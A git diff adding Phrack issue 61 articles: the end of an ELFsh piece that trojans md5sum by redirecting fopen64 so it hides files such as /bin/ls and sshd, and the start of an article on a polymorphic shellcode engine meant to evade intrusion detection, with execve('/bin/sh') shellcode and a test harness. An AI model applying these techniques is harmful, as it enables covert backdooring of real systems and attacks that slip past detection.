+[DEBUG_COPYPLT] Symbol at .plt + 112 injected succesfully
+[DEBUG_RELADD] Injected symbol old_dcgettext              [08045174]
+[DEBUG_COPYPLT] Symbol at .plt + 128 injected succesfully
+[DEBUG_RELADD] Injected symbol old_setlocale              [08045184]
+[DEBUG_COPYPLT] Symbol at .plt + 144 injected succesfully
+[DEBUG_RELADD] Injected symbol old___errno_location       [08045194]
+[DEBUG_COPYPLT] Symbol at .plt + 160 injected succesfully
+[DEBUG_RELADD] Injected symbol old_puts                   [080451A4]
+[DEBUG_COPYPLT] Symbol at .plt + 176 injected succesfully
+[DEBUG_RELADD] Injected symbol old_malloc                 [080451B4]
+[DEBUG_COPYPLT] Symbol at .plt + 192 injected succesfully
+[DEBUG_RELADD] Injected symbol old_fread                  [080451C4]
+[DEBUG_COPYPLT] Symbol at .plt + 208 injected succesfully
+[DEBUG_RELADD] Injected symbol old___deregister_frame_info [080451D4]
+[DEBUG_COPYPLT] Symbol at .plt + 224 injected succesfully
+[DEBUG_RELADD] Injected symbol old_bindtextdomain         [080451E4]
+[DEBUG_COPYPLT] Symbol at .plt + 240 injected succesfully
+[DEBUG_RELADD] Injected symbol old_fputs                  [080451F4]
+[DEBUG_COPYPLT] Symbol at .plt + 256 injected succesfully
+[DEBUG_RELADD] Injected symbol old___libc_start_main      [08045204]
+[DEBUG_COPYPLT] Symbol at .plt + 272 injected succesfully
+[DEBUG_RELADD] Injected symbol old_realloc                [08045214]
+[DEBUG_COPYPLT] Symbol at .plt + 288 injected succesfully
+[DEBUG_RELADD] Injected symbol old_textdomain             [08045224]
+[DEBUG_COPYPLT] Symbol at .plt + 304 injected succesfully
+[DEBUG_RELADD] Injected symbol old_printf                 [08045234]
+[DEBUG_COPYPLT] Symbol at .plt + 320 injected succesfully
+[DEBUG_RELADD] Injected symbol old_memcpy                 [08045244]
+[DEBUG_COPYPLT] Symbol at .plt + 336 injected succesfully
+[DEBUG_RELADD] Injected symbol old_fclose                 [08045254]
+[DEBUG_COPYPLT] Symbol at .plt + 352 injected succesfully
+[DEBUG_RELADD] Injected symbol old_getopt_long            [08045264]
+[DEBUG_COPYPLT] Symbol at .plt + 368 injected succesfully
+[DEBUG_RELADD] Injected symbol old_fopen64                [08045274]
+[DEBUG_COPYPLT] Symbol at .plt + 384 injected succesfully
+[DEBUG_RELADD] Injected symbol old_exit                   [08045284]
+[DEBUG_COPYPLT] Symbol at .plt + 400 injected succesfully
+[DEBUG_RELADD] Injected symbol old_calloc                 [08045294]
+[DEBUG_COPYPLT] Symbol at .plt + 416 injected succesfully
+[DEBUG_RELADD] Injected symbol old__IO_putc               [080452A4]
+[DEBUG_COPYPLT] Symbol at .plt + 432 injected succesfully
+[DEBUG_RELADD] Injected symbol old_free                   [080452B4]
+[DEBUG_COPYPLT] Symbol at .plt + 448 injected succesfully
+[DEBUG_RELADD] Injected symbol old_error                  [080452C4]
+[DEBUG_COPYPLT] Symbol at .plt + 464 injected succesfully
+[DEBUG_RELADD] Entering intermediate symbol injection loop
+[DEBUG_RELADD] Injected ET_REL symbol mystrcmp            [080470F4]
+[DEBUG_RELADD] Injected symbol mystrcmp                   [080470F4]
+[DEBUG_RELADD] Injected ET_REL symbol fopen64_troj        [08047188]
+[DEBUG_RELADD] Injected symbol fopen64_troj               [08047188]
+[DEBUG_RELADD] Entering final relocation loop
+[DEBUG_RELADD] Relocate using section test.o.rodata  base [-> 080460F4]
+[DEBUG_RELADD] Relocate using section test.o.text    base [-> 080470F4]
+[DEBUG_RELADD] Relocate using section test.o.rodata  base [-> 080460FC]
+[DEBUG_RELADD] Relocate using section test.o.rodata  base [-> 08046117]
+[DEBUG_RELADD] Relocate using section test.o.text    base [-> 080470F4]
+[DEBUG_RELADD] Relocate using section test.o.rodata  base [-> 08046126]
+[DEBUG_RELADD] Relocate using existing symbol old_fopen64 [08045274]
+ [*] ET_REL test.o injected succesfully in ET_EXEC /usr/bin/md5sum
+
+~redir fopen64 fopen64_troj
+ [*] Function fopen64 redirected to addr 0x08047188 <fopen64_troj>
+
+~save md5sum.new
+ [*] Object md5sum.new save successfully
+
+~quit
+ [*] Unloading object 1 (test.o)
+ [*] Unloading object 2 (/usr/bin/md5sum) *
+
+         Good bye ! .::. The ELF shell 0.5b9
+ $ 
+ -----END EXAMPLE 18-----
+
+	  
+	  As shown in the script output, the new file has got new
+	  symbols (the old symbols). Let's observe them using the
+	  elfsh '-sym' command and the regex capability ('old') :
+
+
+ -----BEGIN EXAMPLE 19-----
+ $ elfsh -q -f md5sum.new -sym old
+ [SYMBOL TABLE]
+ [Object md5sum.new]
+
+ [27] 0x80450f4  FUNC old_dlresolve                sz:16 scop:Local 
+ [28] 0x8045104  FUNC old_ferror                   sz:16 scop:Local 
+ [29] 0x8045114  FUNC old_strchr                   sz:16 scop:Local 
+ [30] 0x8045124  FUNC old_feof                     sz:16 scop:Local 
+ [31] 0x8045134  FUNC old___register_frame_info    sz:16 scop:Local 
+ [32] 0x8045144  FUNC old___getdelim               sz:16 scop:Local 
+ [33] 0x8045154  FUNC old_fprintf                  sz:16 scop:Local 
+ [34] 0x8045164  FUNC old_fflush                   sz:16 scop:Local 
+ [35] 0x8045174  FUNC old_dcgettext                sz:16 scop:Local 
+ [36] 0x8045184  FUNC old_setlocale                sz:16 scop:Local 
+ [37] 0x8045194  FUNC old___errno_location         sz:16 scop:Local 
+ [38] 0x80451a4  FUNC old_puts                     sz:16 scop:Local 
+ [39] 0x80451b4  FUNC old_malloc                   sz:16 scop:Local 
+ [40] 0x80451c4  FUNC old_fread                    sz:16 scop:Local 
+ [41] 0x80451d4  FUNC old___deregister_frame_info  sz:16 scop:Local 
+ [42] 0x80451e4  FUNC old_bindtextdomain           sz:16 scop:Local 
+ [43] 0x80451f4  FUNC old_fputs                    sz:16 scop:Local 
+ [44] 0x8045204  FUNC old___libc_start_main        sz:16 scop:Local 
+ [45] 0x8045214  FUNC old_realloc                  sz:16 scop:Local 
+ [46] 0x8045224  FUNC old_textdomain               sz:16 scop:Local 
+ [47] 0x8045234  FUNC old_printf                   sz:16 scop:Local 
+ [48] 0x8045244  FUNC old_memcpy                   sz:16 scop:Local 
+ [49] 0x8045254  FUNC old_fclose                   sz:16 scop:Local 
+ [50] 0x8045264  FUNC old_getopt_long              sz:16 scop:Local 
+ [51] 0x8045274  FUNC old_fopen64                  sz:16 scop:Local 
+ [52] 0x8045284  FUNC old_exit                     sz:16 scop:Local 
+ [53] 0x8045294  FUNC old_calloc                   sz:16 scop:Local 
+ [54] 0x80452a4  FUNC old__IO_putc                 sz:16 scop:Local 
+ [55] 0x80452b4  FUNC old_free                     sz:16 scop:Local 
+ [56] 0x80452c4  FUNC old_error                    sz:16 scop:Local 
+ $ 
+ -----END EXAMPLE 19-----
+
+
+	  It sounds good ! Does it work now?
+
+	 
+
+   $ md5sum /bin/bash
+   ebe1f822a4d026c366c8b6294d828c87  /bin/bash
+   $ ./md5sum.new /bin/bash
+   ebe1f822a4d026c366c8b6294d828c87  /bin/bash
+
+   $ md5sum /bin/ls 
+   3b622e661f6f5c79376c73223ebd7f4d  /bin/ls
+   $ ./md5sum.new /bin/ls 
+   ./md5sum.new: /bin/ls: No such file or directory
+
+   $ md5sum /usr/sbin/sshd 
+   720784b7c1e5f3418710c7c5ebb0286c  /usr/sbin/sshd
+   $ ./md5sum.new /usr/sbin/sshd 
+   ./md5sum.new: /usr/sbin/sshd: No such file or directory
+
+   $ ./md5sum.new ./md5sum.new   
+   b52b87802b7571c1ebbb10657cedb1f6  ./md5sum.new
+   $ ./md5sum.new /usr/bin/md5sum 
+   8beca981a42308c680e9669166068176  /usr/bin/md5sum
+   $ 
+
+
+   Heheh. It work so well that even if you forget to put the original
+   copy in your hidden directory, md5sum prints the original path and
+   not your hidden directory path ;). This is because we only change a
+   local pointer in the fopen64_troj() function, and the caller function
+   is not aware of the modification, so the caller error message is
+   proceeded with the original path.
+ 
+   Let's give the detailed algorithm for the ALTPLT technique. It must
+   be used as a '2 bis' step in the main ET_REL injection algorithm
+   given in the previous chapter, so that injected code can use any
+   old_* symbols:
+
+    
+    - Create new section header with same size, type, rights as .plt
+    - Insert new section header
+    IF current OS == FreeBSD
+    [
+       - Inject section using post-bss technique.
+    ]
+    ELSE
+    [
+       - Inject section using pre-interp technique.
+    ]
+    FOREACH .plt entry (while counter < sh_size)
+    [
+      IF counter == 0 AND current architecture is SPARC
+      [
+        - Infect current entry using %g2 register.
+      ]
+      - Inject new 'old_<name>' symbol pointing on current entry 
+        (= sh_addr + cnt)
+      - Add PLT entry size in bytes (SPARC: 12, INTEL: 16) to cnt 
+    ]
+
+
+    This algorithm is executed once and only once per ET_EXEC file. The
+    'redir' command actually performs the PLT infection on demand. A
+    future (better) version of this command would allow core binary
+    function hijacking. Since the code segment is read-only in userland,
+    we cant modify the first bytes of the function at runtime and perform
+    some awful bytes restoration [13] [14] for calling back the original
+    function. The best solution is probably to build full control flow 
+    graphs for the target architecture, and redirect all calls to a given 
+    block (e.g. the first block of the hijacked function), making all 
+    these calls point to the hook function, as suggested in [15] . ELFsh 
+    provides INTEL control flow graphs (see modflow/modgraph), so does 
+    objobf [16], but the feature is not yet available for other
+    architectures, and some specific indirect branchement instructions
+    are not easily predictable [17] using static analysis only, so it
+    remains in the TODO.
+
+
+-------[ 5. The end ?
+
+
+    This is the end, beautiful friend. This is the end, my only friend,
+    the end... Of course, there is a lot of place for improvements and new
+    features in this area. More target architectures are planed (pa-risc,
+    alpha, ppc?), as well as more ELF objects support (version tables,
+    ELF64) and extension for the script langage with simple data and
+    control flow support. The ELF development is made easy using the
+    libelfsh API and the script engine. Users are invited to improve the
+    framework and all comments are really welcomed.
+
+
+-------[ 6. Greets
+
+
+    Greets go to #!dh and #dnerds peoples, you know who you are. Special
+    thanks to duncan @ mygale and zorgon for beeing cool-asses and giving
+    precious feedback. 
+
+    Other thanks, in random order : Silvio Cesare for his great work on
+    the first generation ELF techniques (I definitely learnt a lot from
+    you), all the ELFsh betatesters & contributors (y0 kil3r and thegrugq)
+    who greatly helped to provide reliable and portable software, pipash for
+    finding all the 76 char lenght lines of the article (your feedback
+    r00lz as usual ;) , grsecurity.net (STBWH) for providing a useful
+    sparc/linux account, and Shaun Clowes for giving good hints. 
+
+    Last minut big thanks to the M1ck3y M0us3 H4ck1ng Squ4dr0n and all the
+    peoples at Chaos Communication Camp 2003 (hi Bulba ;) for the great
+    time I had with them during those days, you guyz rock.
+
+
+-------[ 7. References
+
+
+  [1] The ELF shell project				The ELF shell crew
+  MAIN   : elfsh.devhell.org
+  MIRROR : elfsh.segfault.net
+
+  [2] PaX project					The PaX team
+  pageexec.virtualave.net
+
+  [3] ELF TIS reference	          
+  x86.ddj.com/ftp/manuals/tools/elf.pdf
+  www.sparc.com/standards/psABI3rd.pdf (SPARC supplement)
+
+  [4] UNIX ELF parasites and virus			silvio
+  www.u-e-b-i.com/silvio/elf-pv.txt
+
+  [5] Shared library redirection by ELF PLT infection	silvio
+  phrack.org/phrack/56/p56-0x07
+
+  [6] Understanding ELF rtld internals			mayhem
+  devhell.org/~mayhem/papers/elf-rtld.txt
+
+  [7] More ELF buggery (bugtraq post)			thegrugq
+  www.securityfocus.com/archive/1/274283/2002-05-21/2002-05-27/0
+
+  [8] Runtime process infection				anonymous
+  phrack.org/phrack/59/p59-0x08.txt
+
+  [9] Subversive ELF dynamic linking			thegrugq
+  downloads.securityfocus.com/library/subversiveld.pdf
+
+  [10] Static kernel patching				jbtzhm
+  phrack.org/phrack/60/p60-0x08.txt
+ 
+  [11] Run-time kernel patching				silvio
+  www.u-e-b-i.com/silvio/runtime-kernel-kmem-patching.txt
+
+  [12] Bypassing stackguard and stackshield		bulba/kil3r
+  phrack.org/phrack/56/p56-0x05
+
+  [13] Kernel function hijacking			silvio
+  www.u-e-b-i.com/silvio/kernel-hijack.txt
+
+  [14] IA32 advanced function hooking			mayhem
+  phrack.org/phrack/58/p58-0x08
+
+  [15] Unbodyguard (solaris kernel function hijacking)	noir
+  gsu.linux.org.tr/~noir/b.tar.gz
+
+  [16] The object code obfuscator tool of burneye2	scut
+  segfault.net/~scut/objobf/
+
+  [17] Secure Execution Via Program Shepherding		Vladimir Kiriansky
+  www.cag.lcs.mit.edu/dynamorio/security-usenix.pdf	Derek Bruening
+						 	Saman Amarasinghe
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack61/9.txt b/phrack61/9.txt
new file mode 100644
index 0000000..5f58d18
--- /dev/null
+++ b/phrack61/9.txt
@@ -0,0 +1,4642 @@
+                          ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3d, Phile #0x09 of 0x0f
+
+|=--------[Polymorphic Shellcode Engine Using Spectrum Analysis]--------=|
+|=----------------------------------------------------------------------=|
+|=--------[        theo detristan  theo@ringletwins.com        ]--------=|
+|=--------[     tyll ulenspiegel tyllulenspiegel@altern.org    ]--------=| 
+|=--------[         yann_malcom   yannmalcom@altern.org        ]--------=|
+|=--------[ mynheer superbus von underduk msvu@ringletwins.com ]--------=|
+|=----------------------------------------------------------------------=|
+
+
+--[ 0 - Contents
+
+        1 - Abstract
+
+	2 - Introduction
+
+	3 - Polymorphism: principles and usefulness against NIDS.
+
+	4 - Make the classical IDS pattern matching inefficient.
+
+	5 - Spectrum Analysis to defeat data mining methods.
+
+	6 - The CLET polymorphism engine
+
+	7 - References
+
+
+--[ 1 - Abstract
+
+Nowadays, polymorphic is maybe an overused word. Some programs called 
+polymorphism engine have been lately released with constant decipher 
+routines. Polymorphism is a method against pattern matching (cf 3.2), 
+if you have constant consecutive bytes in the code you generate, NIDS 
+will always be able to recognize the signature of those constant bytes... 
+
+In some real engine (which generate non-constant decipher routine like 
+ADMmutate), there are some weaknesses left (maybe weaknesses isn't the 
+best word since the recent NIDS are not able to exploit them) like the
+XOR problem (cf 4.2) or a NOP zone with only one byte instructions 
+(cf 4.1). In our engine, we have been interested in these problems (cf 4)
+and we have tried to implement some solutions. We have tried too to 
+implement methods against the next generation of NIDS using data-mining
+methods (cf 5).
+
+However we don't claim to have created an 'ultimate' polymorphic 
+engine. We are aware of some weaknesses that exist and can be solved with   
+solutions we expose below but we haven't implemented yet. There are 
+probably some weaknesses too we're not aware of, your mails are welcome
+for the next version. 
+
+This article explains our work, our ideas, we hope you will enjoy it.
+
+
+--[ 2 - Introduction
+
+Since the famous "Smashing the stack for fun and profit", the technique
+of buffer overflow has been widely used to attack systems.
+
+To confine the threat new defense systems have appeared based on pattern 
+matching. Nowadays, Intrusion Detection System (IDS) listen the trafic 
+and try to detect and deny packets containing shellcode used in buffer 
+overflow attacks.
+
+On the virus scene, a technique called polymorphism appeared in 1992. The
+idea behind this technique is very simple, and this idea can be applied to 
+shellcodes. ADMmutate is a first public attempt to apply polymorphism to 
+shellcode.
+
+Our aim was to try to improve the technique, find enhancements and to
+apply them to an effective polymophic shellcode engine.
+
+
+--[ 3 - Polymorphism: principles and usefulness against NIDS.
+
+----[ 3.1 - Back in 1992...
+
+In 1992, Dark Avenger invented a revolutionary technique he called 
+polymorphism. What is it ? It simply consist of ciphering the code of the 
+virus and generate a decipher routine which is different at each time, so 
+that the whole virus is different at each time and can't be scanned !
+
+Very good polymorphic engines have appeared : the TridenT Polymorphic
+Engine (TPE), Dark Angel Mutation Engine (DAME).
+
+As a consequence, antivirus makers developped new heuristic techniques
+such as spectrum analysis, code emulators, ...
+
+
+----[ 3.2 - Principles of polymorphism
+
+Polymorphism is a generic method to prevent pattern-matching. Pattern-
+matching means that a program P (an antivirus or an IDS) has a data-base
+with 'signatures'. A signature is bytes suite identifying a program.
+Indeed, take the following part of a shellcode:
+
+        push byte 0x68
+        push dword 0x7361622f
+        push dword 0x6e69622f
+        mov ebx,esp
+
+        xor edx,edx
+        push edx
+        push ebx
+        mov ecx,esp
+        push byte 11
+        pop eax
+        int 80h
+
+This part makes an execve("/bin/bash",["/bin/bash",NULL],NULL) call.
+This part is coded as:
+"\x6A\x68\x68\x2F\x62\x61\x73\x68\x2F\x62\x69\x6E\x89\xE3\x31\xD2"
+"\x52\x53\x89\xE1\x6A\x0B\x58\xCD\x80". 
+If you locate this contiguous bytes in a packet destinated to a web 
+server, it can be an attack. An IDS will discard this packet. 
+Obviously, there are other methods to make an execve call, however, it 
+will make an other signature. That's what we call pattern matching. 
+Speak about viruses or shellcodes is not important, the principles are the 
+same. We will see later the specificities of shellcodes.
+
+Imagine now you have a code C that a program P is searching for. Your 
+code is always the same, that's normal, but it's a weakness. P can have 
+a caracteristic sample, a signature, of C and make pattern matching to 
+detect C. And then,C is no longer useable when P is running.
+
+The first idea is to cipher C. Imagine C is like that :
+
+            [CCCCCCC]
+
+Then you cipher it :
+
+            [KKKKKKKK]
+
+But if you want to use C, you must put a decipher routine in front of it :
+
+        [DDDDKKKKKKKK]
+
+Great ! You have ciphered C and the sample of C that is in P is no longer 
+efficient. But you have introduced a new weakness because your decipher 
+routine will be rather the same (except the key) each time and P will be 
+able to have a sample of the decipher routine.
+
+So finally, you have ciphered C but it is still detected :(
+
+And polymorphism was born !
+
+The idea is to generate a different decipher routine each time."different" 
+really means different, not just the key. You can do it with different 
+means :
+  - generate a decipher routine with different operations at each time. A 
+  classic cipher/decipher routine uses a XOR but you can use whatever 
+  operation that is reversible : ADD/SUB, ROL/ROR, ... 
+  - generate fake code between the true decipher code. For example, if you
+  don't use some registers, you can play with them, making fake operations
+  in the middle of the effective decipher code.
+  - make all of them.
+
+So a polymorphism engine makes in fact 2 things :
+  - cipher the body of the shellcode.
+  - generate a decipher routine which is _different_ at each time.
+
+
+----[ 3.3 - Polymorphism versus NIDS.
+
+A code of buffer overflow has three or four parts:
+--------------------------------------------------------------------------
+|         NOP        |   shellcode   | bytes to cram |    return adress  |
+--------------------------------------------------------------------------
+
+Nowadays, NIDS try to find consecutive NOPs and make pattern matching on 
+the shellcodes when it believes to have detected a fakenop zone. This is
+not a really efficient method, however we could imagine methodes to 
+recognize the part of bytes which cram the buffer or the numberous 
+consecutive return adresses.
+So, our polymorphic engine have to work on each of those parts to make them 
+unrecognizable. That's what we try to do:
+
+- firstly, the NOPs series is changed in a series of random instructions 
+  (cf 4.1 "fake-nop") of 1,2,3 bytes.
+
+- secondly, the shellcode is ciphered (with a random method using more
+  than an only XOR) and the decipher routine is randomly generated.
+  (cf 4.2)
+
+- thirdly, in a polymorphic shellcode, a big return adress zone has to 
+  be avoided. Indeed, such a big zone can be detected, particulary by
+  data mining methods. To defeat this detection, the idea is to try to
+  limit the size of the adress zone and to add bytes we choose between
+  shellcode and this zone. This bytes are chosen randomly or by using
+  spectrum analysis (cf 5.3.A).
+
+- endly, we haven't  found a better method than ADMmutate's to covert
+  the return adresses: since the return adresse is chosen with 
+  uncertainly, ADMmutate changes the low-weight bits of the return adress
+  between the different occurences (cf 4.2).
+
+
+NB: Shellcodes are not exactly like virus and we can take advantage of it:
+- A virus must be very careful that the host program still works after 
+  infection ; a shellcode does not care! We know that the shellcode will 
+  be the last thing to be executed so we can do what we want with 
+  registers for example, no need to save them.
+  We can take good avantage of this, and in our fake-nop don't try to make
+  code which makes nothing (like INCR & DECR, ADD & SUB or PUSH & POP...)
+  (what could be moreover easily recognizable by an IDS which would
+  make code emulation). Our fake-nop is a random one-byte instructions 
+  code, and we describe another method (not implemented yet) to improve 
+  this, because generating only one-byte instructions is still a weakness.
+- The random decipher method has to be polymorphed with random code (but
+  not necessarily one-byte instructions) wich makes anything but without
+  consequences on the deciphering (hum... not implemented yet :(
+- A shellcode must not have zeroes in it, since, for our using, we always
+  using strings to stock our code. so we have to take care of it...
+
+Thus, this is what a polymorphic shellcode looks like:
+-------------------------------------------------------------------------
+| FAKENOP | DecipherRoutine | shellcode | bytes to cram | return adress |
+-------------------------------------------------------------------------
+
+Let's now study each part of it.
+
+
+--[ 4 - Make classical IDS pattern matching inefficient. 
+
+----[ 4.1 - Fake NOPs zone with 2,3 bytes instructions.
+
+------[ 4.1.A - Principles
+
+NOPs are necessary before the shellcode itself. In fact, why is it 
+necessary ? Because we don't know exactly where we jump, we just know we    
+jump in the middle of the NOPs (cf article of Aleph One [1]). But it is 
+not necessary to have NOPs, we can have almost any non-dangerous 
+instructions. Indeed, we don't have to save some register, the only
+condition we have is to arrive until the decipher routine without errors.   
+However we can't use any 'non-dangerous' instructions. Indeed, remember
+we don't know exactly where we jump.
+
+One method to avoid this problem is to make the nop zone with only one-
+byte instructions. Indeed, in such a case, wherever we jump we fall on
+an correct instruction. The problem of such a choice is that there is not
+a lot of one byte instructions. It is thus relatively easy for an IDS to 
+detect the NOPs zone. Hopefully many one-byte instructions can be coded 
+with an uppercase letter, and so we could hide the nop zone in an 
+alphanumeric zone using the american-english dictionnary (option -a of 
+clet). However, as we explain in 5, such a choice can be inefficience,
+above all when the service asked is not an 'alphanumeric service' (cf 5).
+
+Thus the problem is : how could we generate a random fake-nop using 
+several-bytes instructions to better covert our fake nop?
+
+There is a simple idea: we could generate two-byte intructions, the
+second byte of which is a one-byte instruction or the first byte of a 
+two-byte instruction of this type and then recursively.
+But let's see what can be problems of such a method.
+
+------[ 4.1.B - Non-dangerous several bytes instructions.
+
+- Instructions using several bytes can be dangerous because they can 
+  modify the stack or segment selectors (etc...) with random effects.
+  So we have to choice harmless instructions (to do it, the book [3] is 
+  our friend... but we have to make a lot of tests on the instructions we
+  are choosing). 
+
+- Some times, several-bytes instructions ask for particular suffixes to 
+  specify a register or a way of using this instruction (see modR/M 
+  [3]). For example, instruction CMP rm32,imm32 (compare) with such a code 
+  "0x81 /7 id" is a 6-bytes instruction which asks for a suffix to specify
+  the register to use, and this register must belong to the seventh column
+  of the "32-bit adressing Forms with the modR/M Byte" (cf[3]). However, 
+  remember that everywhere the code pointer is pointing within the 
+  fake-nop, it must be able to read a valid code. So the suffix and 
+  arguments of instructions must be instructions themselves.
+
+------[ 4.1.C - An easy case
+
+Let's take the string : \x15\x11\xF8\xFA\x81\xF9\x27\x2F\x90\x9E
+If we are following this code from the begining, we are reading:
+
+ADC $0x11F8FA81    #instruction demanding 4-bytes argument
+STC                #one-byte instructions
+DAA
+DAS
+NOP
+SAHF
+
+If we are begining from the second byte, we are reading:
+ADC %eax,%edx
+CMP %ecx,$0x272F909E
+
+Etc... We can begin from everywhere and read a valid code which makes
+nothing dangerous...
+
+------[ 4.1.D Test the fake-nop
+
+char shell[] =
+        "\x99\x13\xF6\xF6\xF8"	          //our fake_nop
+        "\x21\xF8\xF5\xAE"
+        "\x98\x99\x3A\xF8"
+        "\xF6\xF8"
+        "\x3C\x37\xAF\x9E"
+        "\xF9\x3A\xFC"
+        "\x9F\x99\xAF\x2F"
+        "\xF7\xF8\xF9\xAE"
+        "\x3C\x81\xF8\xF9"
+        "\x10\xF5\xF5\xF8"
+        "\x3D\x13\xF9"
+        "\x22\xFD\xF9\xAF"
+                                         //shellcode
+        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
+        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
+        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
+
+
+int main()
+{
+    void (*go)()=(void *) shell;
+    go();
+    return(0);
+}
+
+We test a fake_nop string generate with our code... but it's not really
+efficient as you can see :
+when the adress (shell+i) of the function go() is change the testing 
+program exited with:
+
+shell    -> sh-2.05b$
+shell+1  -> sh-2.05b$
+shell+2  -> Floating point exception  Argh!
+shell+3  -> sh-2.05b$
+shell+4  -> sh-2.05b$
+...
+shell+11 -> sh-2.05b$
+
+We haven't been care enough with the choice and the organization of our
+instructions for the fake_nop and then we can randomly have segfaults
+or Floating point exceptions...(Really boring)
+
+
+------[ 4.2 - The decipher routine
+
+There are maybe two different methods to generate a decipher routine:
+- you can use always the same routine but modify instructions. For 
+instance you can use add eax,2 or inc eax; inc eax; the result will be
+the same but the code not.  
+- you can generate a different routine of decipher too.
+
+In this two methods, you can add code between instructions of the 
+decipher routine. Obviously, this add code mustn't modify running of this
+routine. 
+CLET have chosen the second approach, and we don't generate code between
+instructions because registers we use, order of instructions, type of 
+instructions (ADD,SUB,ROL,ROR,XOR) change each time. Thus it is not 
+necessary to add instructions...
+
+  * XOR with a fixed size key is not enough
+
+There is a problem with using a decipher routine with only a XOR and a
+fixed size key. Mark Ludwig [5] describes it in From virus to antivirus
+with a concrete example. The real problem comes from the associativity and 
+commutativity of the XOR operation and from the constant size of the key.
+
+Imagine you cipher these two bytes B1 B2 with the key K, you obtain two
+ciphered bytes: C1 C2.
+
+            C1 XOR C2 = (B1 XOR K) XOR (B2 XOR K)
+                      = B1 XOR K XOR B2 XOR K
+                      = B1 XOR B2 XOR K XOR K
+                      = B1 XOR B2 XOR (K XOR K)
+                      = B1 XOR B2 XOR 0
+                      = B1 XOR B2
+                      = Constant (independant on K)
+	      
+We understand why an encrypted shellcode with a only XOR decipher routine
+and a fixed size key let a carateristic signature of the shellcode. You
+just have to XOR bytes with their neighboor in case of a single byte key,
+you will always have the same result, which is independant on K. In case
+of you have a key of N bytes, to obtain the signature you XOR bytes k with
+bytes k+N. Such a signature could be exploited by the NIDS (however you
+need a lot of calculation power).
+
+It's important to notice (thanks for those who tell us ;) ) that the real 
+problem is not only a XOR. It's an only-XOR encryption AND a fixed size 
+key. Indeed, some vx polymorphic engines, use an only XOR in the 
+encryption but the key is not the same for all the ciphering. The key
+changes, and size of the key too. In such a case, our demonstration is
+inefficient because B1 and B2 are not ciphered with the same key K and you
+don't know where is the next byte ciphered with the same key (that's what
+you know when you use an only-XOR encryption with a fixed size key of
+several bytes.)
+
+So a cipher routine using only a XOR and a fixed size key is not enough.
+In CLET we generate routines which cipher with several instructions XOR,
+ADD, ROR, ...
+
+
+  * Random registers
+
+Remember we decide to generate a different decipher routine each time.
+Even if we change the type of ciphering each time, it is important too to
+modify asembler instructions that make this decipher routine. To do so,
+we have decided to change registers used. We need three registers, one
+to record address where we are working, one to record byte we are working
+on, one more register for all the other things. We have the choice between
+eax,ebx,ecx,edx. Thus we randomly use three of this registers each time.
+
+
+  * Four bytes encryption to defeat spectrum analysis methods.
+
+Let's begin to explain what we call a spectrum and what is spectrum 
+analysis.
+
+A spectrum of a paquet gives you bytes and number of this bytes in this 
+packet. 
+
+For instance, the following board is a spectrum of a paquet called X:
+
+            |\x00|\x01|\x08|\x0B|\x12|\x1A| ... |\xFE|\xFF|
+            -----------------------------------------------
+            | 25 | 32 | 04 | 18 | 56 | 43 | ... | 67 | 99 |
+
+This board means that there is 25 \x00 in X, 32 \x01, 0 \x02, ...
+This board is what we call spectrum of X. 
+
+A spectrum analysis method makes spectrums of packets and create rules
+thanks to these spectrums. Some IDS use spectrum analysis methods to 
+discard some packets. For instance, imagine that, in a normal trafic, you
+never have packets with more than 20 bytes of \xFF. You can make the 
+following rule: discard packets with more than 20 bytes of \xFF. This 
+is a very simple rule of spectrum analysis, in fact lots of rules are
+generated (with neural approach for instance, see 5.2) about spectrum of
+packets. This rules allow an IDS to discard some packets thanks to their
+spectrums. This is what we call a spectrum analysis method.
+
+Now, let's see how an IDS can put together pattern matching and spectral
+analysis methods.
+
+The idea is to record signatures but not signatures of consecutive bytes,
+signatures of spectrum. For instance, for the previous packet X, we 
+record: 25, 32, 04, 18, 56, 43, ...., 67, 99. Why these values? Because
+if you use a lonely byte encryption these values will always be the same. 
+
+In that way, if we cipher paquet X with the cipher routine XOR 02, ADD 1
+we obtain a packet X' which spectrum is:
+
+
+            |\x03|\x04|\x0A|\x0B|\x11|\x19| ... |\xFD|\xFE|
+            -----------------------------------------------
+            | 25 | 32 | 18 | 04 | 56 | 43 | ... | 67 | 99 |
+
+
+This spectrum is different, order of values is different; however we have 
+the same values but affected to other bytes. Spectrum signature is the
+same. With such a way of encryption, the spectrum of the occurences of
+each encrypted bytes is a permutation of the spectrum of the unencrypted
+bytes. The encryption of a lonely byte return a value which is unique and
+caracteristical of this byte, that's really a problem.
+
+In order to avoid signatures similarities, the shellcode is four bytes 
+encrypted and this method prevents us to have a singular spectrum of 
+occurences. Indeed, if we crypt FFFFFFFF for instance with XOR AABBCCDD,
+ADD 1, we obtain 66554433. Thus, spectrum of X' won't be a permutation 
+of spectrum of X. A four-bytes encryption allows us to avoid this kind
+of spectrum analysis. 
+
+But spectrum analysis methods are just a kind of more general methods,
+called data-mining methods. We will see now what are these methods and 
+how we can use spectrum analysis of the trafic to try to defeat this more 
+general kind of methods.
+
+
+--[ 5 - Spectrum Analysis to defeat data mining methods
+
+
+----[ 5.1 - History 
+
+When vxers had discovered polymorphism, authors of antivirus were afraid 
+that it was the ultimate solution and that pattern matching was dead. 
+To struggle this new kind of viruses, they decided to modify their 
+attacks. Antivirus with heuristic analysis were born. This antivirus tries 
+for instance to execute the code in memory and test if this code modifies
+its own instructions (if it tries to decipher it for instance), in such
+a case, it can be a polymorphed virus.
+As we see upper, four-bytes encryption, not using an only XOR and a fixed
+size key, fakenop zone with more than one-byte instructions allow to 
+'defeat' pattern matching. Perhaps it remains some weaknesses, however we
+think that polymorphism engines will be more and more efficient and that
+finally it will be too difficult to implement efficient pattern matching
+methods in IDS.
+Will IDS take example on the antivirus and try to implement heuristic
+method? We don't think so because there is a big difference between IDS 
+and antivirus, IDS have to work in real time clock mode. They can't record
+all packets and analyse them later. Maybe an heuristic approach won't be
+used. Besides, Snort IDS, which tries to develop methods against
+polymorphed shellcodes, don't use heuristic methods but data mining
+methods. It's probably these methods which will be developped, so that's
+against these  methods we try to create polymorphic shellcodes as we
+explain in 5.3 after having given a quick explaination about data mining
+methods.
+
+
+----[ 5.2 - A example of a data mining method, the neural approach
+            or using a perceptron to recognize polymorphic shellcode.
+
+
